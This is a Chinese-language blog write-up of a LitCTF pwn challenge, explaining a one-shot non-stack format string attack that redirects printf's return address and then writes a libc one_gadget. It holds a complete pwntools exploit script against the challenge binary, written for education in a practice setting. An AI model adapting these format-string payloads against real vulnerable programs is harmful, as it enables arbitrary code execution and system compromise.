
  <!DOCTYPE html>
  <html lang="zh-CN"  
    
      data-theme-mode="auto"
    
  >
  <head>
  
  <meta charset="utf-8">
  

  

  

  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_0khxww3tj3q9';window.REIMU_CONFIG.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":100,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};window.REIMU_CONFIG.code_block = {"expand":true};window.REIMU_CONFIG.base = 'https://Khighl.github.io.git';</script>
  
  <title>
    LitCTF |
    
    Hexo
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  
  
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_0khxww3tj3q9.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="一次有趣的非栈上格式化字符串攻击参考:孤鸿师傅的博客 题目链接:NSS靶场 前言:litctf中出现的一道奇怪的题目,打完比赛后gets师傅告诉我这种题出现过几次,还甩给我一篇博客.结果打开一看,发现是楠哥的文章. 世界可真小 glibc的知识怎么永远学不完啊 题目分析 题目给了我们栈地址和libc地址,,并给了我们一次非栈上格式化字符串的机会,之后立马使用_exit(0)退出 由于使用的是_ex">
<meta property="og:type" content="article">
<meta property="og:title" content="LitCTF">
<meta property="og:url" content="https://khighl.github.io.git/2025/05/27/%E9%9D%9E%E6%A0%88%E4%B8%8A%E7%9A%84fmt/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="一次有趣的非栈上格式化字符串攻击参考:孤鸿师傅的博客 题目链接:NSS靶场 前言:litctf中出现的一道奇怪的题目,打完比赛后gets师傅告诉我这种题出现过几次,还甩给我一篇博客.结果打开一看,发现是楠哥的文章. 世界可真小 glibc的知识怎么永远学不完啊 题目分析 题目给了我们栈地址和libc地址,,并给了我们一次非栈上格式化字符串的机会,之后立马使用_exit(0)退出 由于使用的是_ex">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://khighl.github.io.git/images/fmt/1748334264961.png">
<meta property="og:image" content="https://khighl.github.io.git/images/fmt/1748335453145.png">
<meta property="og:image" content="https://khighl.github.io.git/images/fmt/1748335538861.png">
<meta property="article:published_time" content="2025-05-26T16:00:00.000Z">
<meta property="article:modified_time" content="2025-05-27T10:04:15.991Z">
<meta property="article:author" content="zer00ne">
<meta property="article:tag" content="安全">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://khighl.github.io.git/images/fmt/1748334264961.png">
  
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.0/dist/aos.css">

  
  
  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body>
    
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi rotate">
        
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
        
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/">首页</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/archives">归档</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/about">关于</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/friend">友链</a>
        </span>
      
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅" target="_blank"></a>
    
    
    
  </nav>
  
</div>
<header id="header">
  
    
      
        <picture>
          
        </picture>
        
          <img  fetchpriority="high" src="/images/banner.webp" alt="LitCTF">
        
      
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">LitCTF</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content"  class="sidebar-right" >
          <aside id="sidebar">
  
  
  
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        
          <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E6%AC%A1%E6%9C%89%E8%B6%A3%E7%9A%84%E9%9D%9E%E6%A0%88%E4%B8%8A%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%94%BB%E5%87%BB"><span class="toc-number">1.</span> <span class="toc-text">一次有趣的非栈上格式化字符串攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">前言:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90"><span class="toc-number">1.2.</span> <span class="toc-text">题目分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9B%9E%E9%A1%BE-%E9%9D%9E%E6%A0%88%E4%B8%8A%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%AE%9E%E7%8E%B0%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%99"><span class="toc-number">1.2.1.</span> <span class="toc-text">回顾:非栈上格式化字符串实现任意地址写</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B0%E6%89%8B%E6%B3%95-%E5%88%A9%E7%94%A8%E5%8C%85%E5%90%AB-%E7%AC%A6%E5%92%8C%E9%9D%9E-%E7%AC%A6%E7%9A%84%E8%A7%A3%E6%9E%90%E9%80%9F%E5%BA%A6%E5%B7%AE%E5%BC%82%E4%B8%80%E6%AC%A1%E6%80%A7%E4%BF%AE%E6%94%B9%E4%B8%89%E8%81%94%E6%A0%88%E9%93%BE%E5%92%8C%E4%BA%8C%E8%81%94%E6%A0%88%E9%93%BE"><span class="toc-number">1.2.2.</span> <span class="toc-text">新手法:利用包含$符和非$符的解析速度差异一次性修改三联栈链和二联栈链</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E6%9E%9A%E6%94%BB%E5%87%BB%E8%BD%BD%E8%8D%B7"><span class="toc-number">1.2.3.</span> <span class="toc-text">第一枚攻击载荷</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%90%8E%E7%BB%AD%E5%88%A9%E7%94%A8"><span class="toc-number">1.2.4.</span> <span class="toc-text">后续利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EXP"><span class="toc-number">1.3.</span> <span class="toc-text">EXP</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
          <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="zer00ne" class="lazyload">
  <div class="sidebar-author-name">zer00ne</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">15</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">6</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
        
      
      
        
          <div class="sidebar-btn-wrapper" style="position:static">
            <div class="sidebar-toc-btn current"></div>
            <div class="sidebar-common-btn"></div>
          </div>
        
      
    </div>
  </div>

  <div class="sidebar-widget">
  
  </div>
  
</aside>

          <section id="main"><article id="post-非栈上的fmt" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <span class="article-date-link" data-aos="zoom-in">
    <time datetime="2025-05-26T16:00:00.000Z" itemprop="datePublished">2025-05-27</time>
    <time style="display: none;" id="post-update-time">2025-05-27</time>
  </span>
</div>

      

    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <h1 id="一次有趣的非栈上格式化字符串攻击"><a href="#一次有趣的非栈上格式化字符串攻击" class="headerlink" title="一次有趣的非栈上格式化字符串攻击"></a>一次有趣的非栈上格式化字符串攻击</h1><p>参考:<a target="_blank" rel="noopener" href="https://zikh26.github.io/posts/a523e26a.html#%E4%B8%80%E6%AC%A1%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%8E%BB%E7%BC%96%E8%BE%91%E4%B8%80%E4%B8%AA%E4%B8%8D%E5%AD%98%E5%9C%A8%E7%9A%84%E6%8C%87%E9%92%88">孤鸿师傅的博客</a></p>
<p>题目链接:<a target="_blank" rel="noopener" href="https://www.nssctf.cn/problem/6791">NSS靶场</a></p>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言:"></a>前言:</h2><p>litctf中出现的一道奇怪的题目,打完比赛后gets师傅告诉我这种题出现过几次,还甩给我一篇博客.结果打开一看,发现是楠哥的文章.</p>
<p><del>世界可真小</del></p>
<p><del>glibc的知识怎么永远学不完啊</del></p>
<h2 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h2><p><img src="/images/fmt/1748334264961.png" alt="1748334264961"></p>
<p>题目给了我们栈地址和libc地址,,并给了我们一次非栈上格式化字符串的机会,之后立马使用_exit(0)退出</p>
<p>由于使用的是_exit(0)我们无法使用exit_hook或FSOP</p>
<p>本题几乎是摆明了要让我们修改printf的返回地址</p>
<h3 id="回顾-非栈上格式化字符串实现任意地址写"><a href="#回顾-非栈上格式化字符串实现任意地址写" class="headerlink" title="回顾:非栈上格式化字符串实现任意地址写"></a>回顾:非栈上格式化字符串实现任意地址写</h3><p>在常规的非栈上格式化字符串利用中,我们总是有着无限的格式化机会</p>
<p>我们会</p>
<ul>
<li>修改栈上的<strong>三联栈链</strong>,使得链尾的地址在栈上拥有一个可以指向任意栈地址的<strong>二联栈链</strong></li>
<li>然后对二联栈链进行格式化攻击,使得<code>返回地址</code>&#x2F;<code>got</code>表被修改</li>
</ul>
<p>可以看到常规的一次非栈上格式化字符串攻击至少需要两次<code>printf</code>调用,很明显此时我们没有这个条件</p>
<h3 id="新手法-利用包含-符和非-符的解析速度差异一次性修改三联栈链和二联栈链"><a href="#新手法-利用包含-符和非-符的解析速度差异一次性修改三联栈链和二联栈链" class="headerlink" title="新手法:利用包含$符和非$符的解析速度差异一次性修改三联栈链和二联栈链"></a>新手法:利用包含<code>$符</code>和<code>非$符</code>的解析速度差异一次性修改<code>三联栈链</code>和<code>二联栈链</code></h3><p>我们知道,<code>$xxxp</code>会被直接解析为第<code>xxx</code>个参数的地址,比如我们想表示第九个参数的地址,可以使用<code>%9$p</code></p>
<p>但我们还有另一种手法,还记得刚刚学格式化字符串时的<code>%p%p%p%p%p%p...</code></p>
<p>每一个%符都会将解析符号对应的参数自动向后移动</p>
<p>如果我们使用了8个<code>%p</code>,然后使用<code>%n</code>,此时前8个<code>%p</code>被打印出的字符串长度就会被写入第<code>九个参数指向的地址</code></p>
<h3 id="第一枚攻击载荷"><a href="#第一枚攻击载荷" class="headerlink" title="第一枚攻击载荷"></a>第一枚攻击载荷</h3><p>那我们就可以使用这个手法,实现在栈上写入一个包含<code>printf</code>返回地址的<code>三联栈链,</code>同时对返回地址进行修改,使得执行流回到<code>read</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">key=ret&amp;<span class="number">0xffff</span><span class="comment">#ret为printf返回地址</span></span><br><span class="line">payload =<span class="string">b&quot;%p&quot;</span>*<span class="number">9</span></span><br><span class="line">payload+=<span class="string">f&quot;%<span class="subst">&#123;key-<span class="number">92</span>&#125;</span>c%hn&quot;</span>.encode()<span class="comment">#92为9个%p打印出的字符串的长度</span></span><br><span class="line">payload+=<span class="string">f&quot;%<span class="subst">&#123;<span class="number">0x100BA</span>-key&#125;</span>c&quot;</span>.encode()+<span class="string">b&quot;%39$hhn&quot;</span></span><br><span class="line"><span class="comment">#gdb.attach(io,&quot;b *$rebase(0x8DC)&quot;)</span></span><br><span class="line">io.send(payload.ljust(<span class="number">0x100</span>,<span class="string">b&#x27;\x00&#x27;</span>))<span class="comment">#1</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>可以看到,我们成功将返回地址修改为read,此时我们可以进行二次读入</p>
<p><img src="/images/fmt/1748335453145.png" alt="1748335453145"></p>
<p>同时还拥有了三联和二联栈链</p>
<p><img src="/images/fmt/1748335538861.png" alt="1748335538861"></p>
<p>在后续的攻击中,我们可以直接对<code>%39$hn</code>进行修改,就不需要再使用大量<code>%p</code>与<code>%n</code>竞争了</p>
<p>同时我们还通过大量<code>%p</code>获得了<code>PIE</code>,现在可以使用elf中的gadget了</p>
<h3 id="后续利用"><a href="#后续利用" class="headerlink" title="后续利用"></a>后续利用</h3><p>此时我们拥有了无限次格式化字符串的机会,那问题就转化为了普通的非栈上格式化字符串问题</p>
<ul>
<li>不过有一点需要注意的就是我们已经占用了一条栈链用于修改返回地址,我们想要继续利用还需要另一条三联栈链.刚刚好,栈中一般都会有包含<code>elf文件名</code>和<code>/bin/bash</code>的栈链</li>
<li>同时我们不能直接对printf的返回地址进行修改,而是对printf返回地址的下一条地址进行修改,修改好后一次性把printf返回地址修改为elf中一个ret的地址,这样就不会影响无限次的格式化机会</li>
<li>本题中刚刚好有一个one_gadget可以在printf返回时被使用,这就节约了我们几步</li>
</ul>
<h2 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io=process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line"><span class="comment">#io=remote(&quot;node1.anna.nssctf.cn&quot;,28653)</span></span><br><span class="line">libc=ELF(<span class="string">&#x27;./libc-2.31.so&#x27;</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">bug</span>():</span><br><span class="line">    gdb.attach(io)</span><br><span class="line">io.recvuntil(<span class="string">b&quot;ift 1 is &quot;</span>)</span><br><span class="line">stack=<span class="built_in">int</span>(io.recv(<span class="number">14</span>),<span class="number">16</span>)</span><br><span class="line">io.recvuntil(<span class="string">b&quot;ift 2 is &quot;</span>)</span><br><span class="line">base=<span class="built_in">int</span>(io.recv(<span class="number">14</span>),<span class="number">16</span>)-libc.sym.puts</span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;stack=&gt;<span class="subst">&#123;<span class="built_in">hex</span>(stack)&#125;</span>\nbase=&gt;<span class="subst">&#123;<span class="built_in">hex</span>(base)&#125;</span>&quot;</span>)</span><br><span class="line">ret=stack-<span class="number">15</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;ret-&gt;<span class="subst">&#123;<span class="built_in">hex</span>(ret)&#125;</span>&quot;</span>)</span><br><span class="line">key=ret&amp;<span class="number">0xffff</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(key))</span><br><span class="line"></span><br><span class="line">one=base+<span class="number">0xe3b01</span></span><br><span class="line">t1=one&amp;<span class="number">0xffff</span></span><br><span class="line">t2=(one&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xffff</span></span><br><span class="line">t3=(one&gt;&gt;<span class="number">32</span>)&amp;<span class="number">0xffff</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(one))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(t1))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(t2))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(t3))</span><br><span class="line">payload =<span class="string">b&quot;%p&quot;</span>*<span class="number">9</span></span><br><span class="line">payload+=<span class="string">f&quot;%<span class="subst">&#123;key-<span class="number">92</span>&#125;</span>c%hn&quot;</span>.encode()</span><br><span class="line">payload+=<span class="string">f&quot;%<span class="subst">&#123;<span class="number">0x100BA</span>-key&#125;</span>c&quot;</span>.encode()+<span class="string">b&quot;%39$hhn&quot;</span></span><br><span class="line">gdb.attach(io,<span class="string">&quot;b *$rebase(0x8DC)&quot;</span>)</span><br><span class="line">io.send(payload.ljust(<span class="number">0x100</span>,<span class="string">b&#x27;\x00&#x27;</span>))<span class="comment">#1</span></span><br><span class="line">io.recvuntil(<span class="string">b&#x27;0x&#x27;</span>)</span><br><span class="line">pie=<span class="built_in">int</span>(io.recv(<span class="number">12</span>),<span class="number">16</span>)-<span class="number">0x201060</span></span><br><span class="line">payload =<span class="string">f&quot;%<span class="subst">&#123;key+<span class="number">8</span>&#125;</span>c%27$hn&quot;</span>.encode()</span><br><span class="line">payload+=<span class="string">f&quot;%<span class="subst">&#123;<span class="number">0x1000BA</span>-key-<span class="number">8</span>&#125;</span>c&quot;</span>.encode()+<span class="string">b&quot;%39$hhn&quot;</span></span><br><span class="line">io.send(payload.ljust(<span class="number">0x100</span>,<span class="string">b&#x27;\x00&#x27;</span>))<span class="comment">#2</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">f&quot;%<span class="subst">&#123;t1&#125;</span>c%41$hn%<span class="subst">&#123;<span class="number">0x1000BA</span>-t1&#125;</span>c%39$hhn&quot;</span>.encode()</span><br><span class="line">io.send(payload.ljust(<span class="number">0x100</span>,<span class="string">b&#x27;\x00&#x27;</span>))<span class="comment">#3</span></span><br><span class="line"><span class="comment">#================================================================</span></span><br><span class="line">payload =<span class="string">f&quot;%<span class="subst">&#123;key+<span class="number">8</span>+<span class="number">2</span>&#125;</span>c%27$hn&quot;</span>.encode()</span><br><span class="line">payload+=<span class="string">f&quot;%<span class="subst">&#123;<span class="number">0x1000BA</span>-key-<span class="number">8</span>-<span class="number">2</span>&#125;</span>c&quot;</span>.encode()+<span class="string">b&quot;%39$hhn\x00&quot;</span></span><br><span class="line"></span><br><span class="line">io.send(payload.ljust(<span class="number">0x100</span>,<span class="string">b&#x27;\x00&#x27;</span>))<span class="comment">#4</span></span><br><span class="line">payload=<span class="string">f&quot;%<span class="subst">&#123;t2&#125;</span>c%41$hn%<span class="subst">&#123;<span class="number">0x1000BA</span>-t2&#125;</span>c%39$hhn\x00&quot;</span>.encode()</span><br><span class="line">io.send(payload.ljust(<span class="number">0x100</span>,<span class="string">b&#x27;\x00&#x27;</span>))<span class="comment">#5</span></span><br><span class="line"><span class="comment">#===============================================================</span></span><br><span class="line">payload =<span class="string">f&quot;%<span class="subst">&#123;key+<span class="number">8</span>+<span class="number">4</span>&#125;</span>c%27$hn&quot;</span>.encode()</span><br><span class="line">payload+=<span class="string">f&quot;%<span class="subst">&#123;<span class="number">0x1000BA</span>-key-<span class="number">8</span>-<span class="number">4</span>&#125;</span>c&quot;</span>.encode()+<span class="string">b&quot;%39$hhn\x00&quot;</span></span><br><span class="line">io.send(payload.ljust(<span class="number">0x100</span>,<span class="string">b&#x27;\x00&#x27;</span>))<span class="comment">#6</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">f&quot;%<span class="subst">&#123;t3&#125;</span>c%41$n%<span class="subst">&#123;<span class="number">0x1000BA</span>-t3&#125;</span>c%39$hhn\x00&quot;</span>.encode()</span><br><span class="line">io.send(payload.ljust(<span class="number">0x100</span>,<span class="string">b&#x27;\x00&#x27;</span>))<span class="comment">#7</span></span><br><span class="line"><span class="comment">#===============================================================</span></span><br><span class="line">ret=(pie+<span class="number">0x954</span>)&amp;<span class="number">0xffff</span></span><br><span class="line">payload=<span class="string">f&quot;%<span class="subst">&#123;ret&#125;</span>c&quot;</span>.encode()+<span class="string">b&quot;%39$hn\x00&quot;</span></span><br><span class="line">io.send(payload.ljust(<span class="number">0x100</span>,<span class="string">b&#x27;\x00&#x27;</span>))<span class="comment">#8</span></span><br><span class="line">io.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/%E5%AE%89%E5%85%A8/" rel="tag">安全</a></li></ul>


    </footer>
  </div>
  
  <nav id="article-nav" data-aos="fade-up">
    
      
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="/covers/erj.jpg" data-sizes="auto" alt="arm合集" class="lazyload">
          
        
        <a href="/2025/05/29/arm%E5%9F%BA%E7%A1%80/"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
          
            arm合集
          
        </h3>
      </div>
    
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="/covers/as.jpg" data-sizes="auto" alt="MiniLCTF 2023" class="lazyload">
        
      
      <a href="/2025/05/15/MiniLCTF%202023/"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
        
          MiniLCTF 2023
        
      </h3>
    </div>
    
  </nav>


</article>










</section>
        </div>
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      
      
      
        2020-2025
      
      <span class="footer-info-sep rotate"></span>
      zer00ne
    </div>
    
      <div>
        基于&nbsp;<a href="https://hexo.io/" rel="noopener external nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener external nofollow noreferrer" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        35.6k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        02:34
      </div>
    
    
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        
          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E6%AC%A1%E6%9C%89%E8%B6%A3%E7%9A%84%E9%9D%9E%E6%A0%88%E4%B8%8A%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%94%BB%E5%87%BB"><span class="toc-number">1.</span> <span class="toc-text">一次有趣的非栈上格式化字符串攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">前言:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90"><span class="toc-number">1.2.</span> <span class="toc-text">题目分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9B%9E%E9%A1%BE-%E9%9D%9E%E6%A0%88%E4%B8%8A%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%AE%9E%E7%8E%B0%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%99"><span class="toc-number">1.2.1.</span> <span class="toc-text">回顾:非栈上格式化字符串实现任意地址写</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" 